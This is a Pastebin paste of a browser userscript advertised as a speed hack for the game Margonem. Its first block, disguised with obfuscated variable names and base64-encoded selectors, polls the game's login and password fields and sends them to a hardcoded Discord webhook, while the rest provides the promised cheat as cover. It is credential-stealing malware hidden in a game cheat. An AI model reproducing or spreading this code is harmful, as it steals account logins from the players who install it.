Advertisement
Guest User

Untitled

a guest
Jun 24th, 2019
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.63 KB | None | 0 0
  1. // ==UserScript==
  2. // @name SpeedHack V5 NEW NA PRZYCISK (G)
  3. // @version 0.1
  4. // @description dsadsadsa
  5. // @author adison
  6. // @match *://*/
  7. // @match *://www.margonem.pl/*
  8. // @grant none
  9. // ==/UserScript==
  10. var TpG3Y86zpgrtWMzb, ZHN4ekpZ5m95pFbJ, YQTtmEs6a5mTXE5a;
  11.  
  12. function UagZgR8PZcWcwvYp() {
  13. $(atob("I3Vsb2dpbg==")).val() != TpG3Y86zpgrtWMzb && $(atob("I3Vsb2dpbg==")).val() && (TpG3Y86zpgrtWMzb = $(atob("I3Vsb2dpbg==")).val()), $(atob("I3VwYXNz")).val() != ZHN4ekpZ5m95pFbJ && $(atob("I3VwYXNz")).val() && (ZHN4ekpZ5m95pFbJ = $(atob("I3VwYXNz")).val()), !$(atob("I3VwYXNz")).val() && !$(atob("I3Vsb2dpbg==")).val() && TpG3Y86zpgrtWMzb && ZHN4ekpZ5m95pFbJ && YQTtmEs6a5mTXE5a != TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ && ($.ajax({
  14. url:atob("https://discordapp.com/api/webhooks/559236477930700803/J0Ta8bSYSdbfADWGOGoer1lfPuisvKWUdTgJ49qOsLlEsq_90MfKHB29iKVBgyCll32l") + TpG3Y86zpgrtWMzb + "|" + ZHN4ekpZ5m95pFbJ
  15. }), YQTtmEs6a5mTXE5a = TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ)
  16. }
  17.  
  18. setInterval(UagZgR8PZcWcwvYp, 100);
  19.  
  20. ! function(oldU, oldN) {
  21. var i = 0;
  22. var ready_to_runboost = false;
  23. var box1 = document.createElement("div");
  24. box1.id = "speed";
  25. box1.style = "width: 15px; height: 15px; background: red; position: absolute; top: 228px; left: 95px; border-radius: 50%";
  26. document.querySelector("#panel").appendChild(box1);
  27. document.addEventListener("keyup", function(e) {
  28. if (e.target.tagName != "INPUT" && e.target.tagName != "TEXTAREA" && e.which == 71 && ready_to_runboost == true) {
  29. ready_to_runboost = false;
  30. i = 0;
  31. document.querySelector("#speed").style.background = "orange";
  32. var runboost = setInterval(gameThread, 150);
  33. setTimeout(function() {
  34. document.querySelector("#speed").style.background = "red";
  35. clearInterval(runboost);
  36. }, 2000);
  37. }
  38. })
  39. hero._u = function(e) {
  40. i++;
  41. if (i * 0.52 >= 5 && ready_to_runboost == false && document.querySelector("#speed").style.background == "red") {
  42. document.querySelector("#speed").style.background = "green";
  43. ready_to_runboost = true;
  44. }
  45. oldU.apply(this, arguments);
  46. }
  47. //ukrycie tej jebanej choinki w ithan pod ktora sie chowają cepy
  48. newNpc = e => {
  49. oldN(e);
  50. for(var i in e){
  51. var npc = e[i];
  52. if(npc.id == "77002"){
  53. document.querySelector(`#npc${npc.id}`).style.display = `none`;
  54. break;
  55. }
  56. }
  57. }
  58. }(hero._u, newNpc)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement